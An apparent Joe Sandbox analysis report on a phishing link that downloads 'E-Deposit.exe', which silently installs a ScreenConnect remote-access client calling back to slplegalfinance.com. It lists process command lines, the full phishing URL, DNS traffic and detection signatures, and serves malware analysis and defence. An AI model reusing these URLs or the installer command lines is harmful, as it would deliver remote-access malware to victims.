Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3

Overview

General Information

Sample URL:https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcomm
Analysis ID:1584783
Infos:

Detection

ScreenConnect Tool
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Changes security center settings (notifications, updates, antivirus, firewall)
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7072 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3012 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 6644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • rundll32.exe (PID: 348 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • svchost.exe (PID: 4092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • E-Deposit.exe (PID: 3580 cmdline: "C:\Users\user\Downloads\E-Deposit.exe" MD5: 70D47FA2E078F04400D3D1B236245678)
  • E-Deposit.exe (PID: 4136 cmdline: "C:\Users\user\Downloads\E-Deposit.exe" MD5: 70D47FA2E078F04400D3D1B236245678)
    • msiexec.exe (PID: 4524 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 5448 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 2116 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 1BC1320587D07C03BB9395DF6C2ADCED C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 6468 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6898.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5269750 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7204 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9303049AB6428507101C6ED81D77CA3A MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7312 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A00F0AFBAE6A0A1DBE6AED689C5C8D07 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 4788 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 2648 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 4012 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2948 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7256 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 7364 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=316b6739-92f5-44b7-a8b7-61cbbec9d115&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 7484 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "84d633ef-1886-4997-bb3e-cec00c13098d" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • cleanup
SourceRuleDescriptionAuthorStrings
C:\Users\user\Downloads\Unconfirmed 367452.crdownloadJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Windows\Temp\~DFB71A7B35B829F0DC.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Temp\~DF9CBAF1865D94B65A.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Temp\~DF32625EBD992E86ED.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Config.Msi\506f30.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Click to see the 10 entries
            SourceRuleDescriptionAuthorStrings
            0000000E.00000002.1255943146.0000000005C50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              0000001B.00000000.1289665825.00000000005B2000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                0000000E.00000002.1258853772.0000000007AA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  0000000B.00000000.1231145401.0000000000636000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    0000000E.00000002.1247162256.0000000003301000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      Click to see the 1 entries
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (484f9eed1d8e13b9) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 5448, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-3A73-5AC4396425A8}\(Default)
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4092, ProcessName: svchost.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\Downloads\E-Deposit.exe (copy)ReversingLabs: Detection: 26%
                      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49711 version: TLS 1.2
                      Source: C:\Windows\System32\msiexec.exeFile opened: z:
                      Source: C:\Windows\System32\msiexec.exeFile opened: x:
                      Source: C:\Windows\System32\msiexec.exeFile opened: v:
                      Source: C:\Windows\System32\msiexec.exeFile opened: t:
                      Source: C:\Windows\System32\msiexec.exeFile opened: r:
                      Source: C:\Windows\System32\msiexec.exeFile opened: p:
                      Source: C:\Windows\System32\msiexec.exeFile opened: n:
                      Source: C:\Windows\System32\msiexec.exeFile opened: l:
                      Source: C:\Windows\System32\msiexec.exeFile opened: j:
                      Source: C:\Windows\System32\msiexec.exeFile opened: h:
                      Source: C:\Windows\System32\msiexec.exeFile opened: f:
                      Source: C:\Windows\System32\svchost.exeFile opened: d:
                      Source: C:\Windows\System32\msiexec.exeFile opened: b:
                      Source: C:\Windows\System32\msiexec.exeFile opened: y:
                      Source: C:\Windows\System32\msiexec.exeFile opened: w:
                      Source: C:\Windows\System32\msiexec.exeFile opened: u:
                      Source: C:\Windows\System32\msiexec.exeFile opened: s:
                      Source: C:\Windows\System32\msiexec.exeFile opened: q:
                      Source: C:\Windows\System32\msiexec.exeFile opened: o:
                      Source: C:\Windows\System32\msiexec.exeFile opened: m:
                      Source: C:\Windows\System32\msiexec.exeFile opened: k:
                      Source: C:\Windows\System32\msiexec.exeFile opened: i:
                      Source: C:\Windows\System32\msiexec.exeFile opened: g:
                      Source: C:\Windows\System32\msiexec.exeFile opened: e:
                      Source: C:\Windows\System32\svchost.exeFile opened: c:
                      Source: C:\Windows\System32\msiexec.exeFile opened: a:

                      Networking

                      barindex
                      Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL Service
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: global trafficDNS traffic detected: DNS query: g248jqtc.r.ap-south-1.awstrack.me
                      Source: global trafficDNS traffic detected: DNS query: fub.direct
                      Source: global trafficDNS traffic detected: DNS query: westcommerce.com.br
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                      Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                      Source: global trafficDNS traffic detected: DNS query: slplegalfinance.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49711 version: TLS 1.2

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\506f2f.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI71A0.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI71C1.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7423.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\506f31.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\506f31.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}\DefaultIcon
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.SchedServiceConfig.rmi
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vieiefum.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vieiefum.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\utizbm3q.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\utizbm3q.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\cyulqgum.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\cyulqgum.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\mqp0rkl4.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\mqp0rkl4.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\x0n525cd.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\x0n525cd.newcfg
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI71C1.tmp
                      Source: classification engineClassification label: mal72.evad.win@42/51@13/45
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMutant created: NULL
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                      Source: C:\Users\user\Downloads\E-Deposit.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnect
                      Source: C:\Users\user\Downloads\E-Deposit.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3012 --field-trial-handle=2008,i,1922110675289968434,4499670213959222039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
